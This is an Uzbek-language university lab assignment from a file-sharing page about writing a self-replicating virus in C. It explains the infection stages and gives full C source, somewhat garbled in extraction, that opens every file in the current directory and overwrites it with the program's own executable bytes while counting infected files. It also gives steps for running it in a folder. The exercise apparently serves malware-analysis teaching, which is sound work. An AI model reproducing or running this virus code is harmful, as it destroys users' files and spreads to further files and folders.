Amaliy ish №7


Download 19.32 Kb.
Sana09.06.2023
Hajmi19.32 Kb.
#1469167
Bog'liq
Amaliy ish 7

Amaliy ish № 7.




Ishdan maqsad: C dasturlash tilida o’zini nusxasini yaratuvchi sodda dastur yozish.
Mavzu: O'zini-o'zi nusxalovchi zararkunanda dasturiy vositalarni yaratish


Nazariy qism: Bu virus faylda o’rnashib olgandan keyin, boshqa fayllarni ham zararlashni boshlaydi. Bu zararlangan fayl yana boshqa katalogdagi fayllarga virus tarqatishda
davom etadi.
Bu dasturning ishlashi quyidagicha:

    1. bosqich: msvjud direktoriyadan faylni qidiradi. Agar bir nechta fayllar bo’lsa, birinchisini o’qiydi(nishon fayl).

    2. bosqich: virus o’z nusxasini xotiraga yuklab qo’yadi.

    3. bosqich: nishon faylni ochadi. Xotiradan virus kodini o’qiydi va nishon faylga joylashtiradi. Nusxalash tugagandan keyin nishon faylni yopadi.

    4. bosqich: zararlash uchun keying faylni ochadi va 3-bosqichga o’tadi. Barcha fayllarni zararlab bo’lgandan so’ng, ochilgan fayllarni yopadi va chiqib ketadi.

Dastur kodi quyidagidan iborat:

#include #include #include #include #include #include FILE *virus,*host; int done,a=0; unsigned long x;


char buff[2048]; struct ffblk ffblk; clock_t st,end; void main()


{
st=clock(); clrscr();
done=findfirst(“*. *”,&ffblk,0); while(!done)
{
virus=fopen(_argv[0],”rb”); host=fopen(ffblk. ff_name,”rb+”); if(host==NULL) goto next; x=89088;
printf(“Infecting %s\n”,ffblk. ff_name,a); while(x>2048)
{
fread(buff,2048,1,virus); fwrite(buff,2048,1,host); x-=2048;
}
fread(buff,x,1,virus); fwrite(buff,x,1,host); a++;
next:
{
fcloseall(); done=findnext(&ffblk);

}
}
printf(“DONE! (Total Files Infected= %d)”,a); end=clock();


printf(“TIME TAKEN=%f SEC\n”, (end-st)/CLK_TCK);
getch();
}
Dastur yaratilgandan keyin uni quyidagicha ishga tushirish mumkin:



  1. Yangi bo’sh papka yarating;

  2. Unga bir nechta fayllarni joylashtiring;

  3. PC_Virus. exe faylini ishga tushiring. Bir necha secundan keyin barcha fayllarni zararlanganini ko’rasiz.

  4. Hosil bo’lgan xar bir fayl virus fayl hisoblanadi va ular boshqa fayllarni zararlashi mumkin. Teslashdan so’ng barcha zararlangan fayllarni o’chirib tashlang.

Foydalanilgan adabiyotlar





  1. Practical Malware Analysis. Copyright © 2012 by Michael Sikorski and Andrew Honig.

  2. С. К. Ғаниев, М. М. Каримов, К. А. Ташев Ахборот хавфсизлиги. “ALOQACHI” – 2008. -381 бет.

  3. Malware Analyst’s Cookbook and DVD: Tools and Techniques for Fighting Malicious Code, First Edition (2010): Michael Ligh, Steven Adair, Blake Hartstein, and Matthew Richard. ISBN-10: 0470613033, ISBN-13: 978-0470613030. Wiley Publications.

Download 19.32 Kb.

Do'stlaringiz bilan baham:



Ma'lumotlar bazasi mualliflik huquqi bilan himoyalangan ©fayllar.org 2024
ma'muriyatiga murojaat qiling